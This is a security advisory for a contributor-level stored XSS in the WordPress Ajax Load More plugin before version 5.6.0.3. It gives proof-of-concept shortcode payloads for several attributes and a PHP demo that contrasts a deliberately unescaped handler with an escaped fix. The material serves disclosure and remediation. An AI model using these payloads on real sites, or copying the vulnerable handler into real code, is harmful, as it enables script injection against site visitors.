WordPress Infinite Scroll - Ajax Load More < 5.6.0.3 - Contributor+ Stored XSS

Description

The plugin does not validate or escape some of its shortcode attributes before outputting them back into the page or post where the shortcode is embedded. Because shortcodes are expanded at render time, after the HTML filtering applied to posts by users without the unfiltered_html capability, this allows users with the Contributor role and above to perform Stored Cross-Site Scripting attacks.

Proof of Concept

Examples (many attributes are affected, not just the ones below)

v < 5.6.0.3
[ajax_load_more id='" onmouseover="alert(/XSS-id-1/)"']
[ajax_load_more id='2" src onerror=alert(/XSSid-2/)//']
[ajax_load_more id='a = 1;alert(/XSSid-3/); var b']

[ajax_load_more button_label='"onmouseover=alert(/XSS-button_label/)//']
[ajax_load_more button_loading_label='"onmouseover=alert(/XSS-button_loading_label/)//']
[ajax_load_more button_done_label='"onmouseover=alert(/XSS-button_done_label/)//']

v < 5.6.0.1
[ajax_load_more max_pages='"onmouseover=alert(/XSS-max_pages/)//']

v < 5.6.0
[ajax_load_more repeater='" onmouseover="alert(/XSS/)"']
[ajax_load_more theme_repeater='" onmouseover="alert(/XSS/)"']
[ajax_load_more tag='" onmouseover="alert(/XSS/)"']

v < 5.5.5 (original from submitter)
[ajax_load_more css_classes='" onmouseover="alert(/XSS/)"']
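
The advisory does not reproduce the plugin's code, so the following is an added illustration, not the Ajax Load More source. It shows the bug class the PoC payloads exercise (shortcode attribute values concatenated into an HTML attribute and into an unquoted inline-JavaScript position) beside the escaped form, and runs three of the payloads above through both. The handler names, the markup and the stand-in esc_attr()/shortcode_atts() definitions are assumptions made so the file runs outside WordPress; which exact sinks the real plugin used is not stated on this page.

```php
<?php
// Added illustration for this advisory; it is NOT the Ajax Load More source.
// It reproduces the bug class described above (shortcode attribute values
// written into HTML and inline JavaScript without escaping) and shows the
// escaped form beside it. Handler names and markup are invented for the demo.

// Stand-ins so the file runs outside WordPress (php demo.php). Inside
// WordPress the real esc_attr() and shortcode_atts() are used instead.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('shortcode_atts')) {
    function shortcode_atts(array $pairs, array $atts) {
        return array_merge($pairs, array_intersect_key($atts, $pairs));
    }
}

// VULNERABLE (the pattern the advisory describes): values are concatenated
// straight into the output. id lands in an HTML attribute and, unquoted, in
// an inline script; button_label lands in a data attribute and element text.
function demo_alm_shortcode_vulnerable(array $atts): string {
    $a = shortcode_atts(['id' => '1', 'button_label' => 'Older Posts'], $atts);
    return '<div id="ajax-load-more-' . $a['id'] . '" class="ajax-load-more-wrap">'
         . '<button class="alm-load-more-btn" data-label="' . $a['button_label'] . '">'
         . $a['button_label'] . '</button>'
         . '</div>'
         . '<script>var alm_id = ' . $a['id'] . ';</script>';
}

// FIXED: escape each value for the context it lands in. esc_attr() neutralises
// quotes and angle brackets in HTML attribute/text positions; json_encode()
// with the HEX flags turns the id into a JS string literal that cannot break
// out of itself or close the <script> element.
function demo_alm_shortcode_fixed(array $atts): string {
    $a = shortcode_atts(['id' => '1', 'button_label' => 'Older Posts'], $atts);
    $js_id = json_encode((string) $a['id'],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return '<div id="ajax-load-more-' . esc_attr($a['id']) . '" class="ajax-load-more-wrap">'
         . '<button class="alm-load-more-btn" data-label="' . esc_attr($a['button_label']) . '">'
         . esc_attr($a['button_label']) . '</button>'
         . '</div>'
         . '<script>var alm_id = ' . $js_id . ';</script>';
}

// Attribute values taken from the PoC above, as WordPress hands them to the
// handler once the shortcode's own surrounding quotes are stripped.
$payloads = [
    ['id' => '" onmouseover="alert(/XSS-id-1/)"'],                 // attribute breakout
    ['id' => 'a = 1;alert(/XSSid-3/); var b'],                      // JS statement injection
    ['button_label' => '"onmouseover=alert(/XSS-button_label/)//'], // attribute breakout
];

foreach ($payloads as $atts) {
    echo "--- atts: " . json_encode($atts) . "\n";
    echo "vulnerable: " . demo_alm_shortcode_vulnerable($atts) . "\n";
    echo "fixed:      " . demo_alm_shortcode_fixed($atts) . "\n\n";
}
```

Run it with php demo.php and compare the two output lines per payload: in the vulnerable output the first payload closes the id attribute and adds an onmouseover handler, and the second becomes a statement sequence inside the script element; in the fixed output the same bytes appear as &quot;-escaped attribute text and as a quoted JS string. If an attribute is meant to be numeric (as the id here), casting with (int) or absint() before use is simpler than escaping, and whitelisting a fixed set of allowed values is the right treatment for attributes such as repeater or theme_repeater that select a template.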

Affects Plugins

WordPress Infinite Scroll - Ajax Load More, fixed in 5.6.0.3
Classification

Type
XSS
CWE
CWE-79
Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Verified
Yes

Timeline

Publicly Published
2023-02-16
Added
2023-02-16
Last Updated
2023-02-27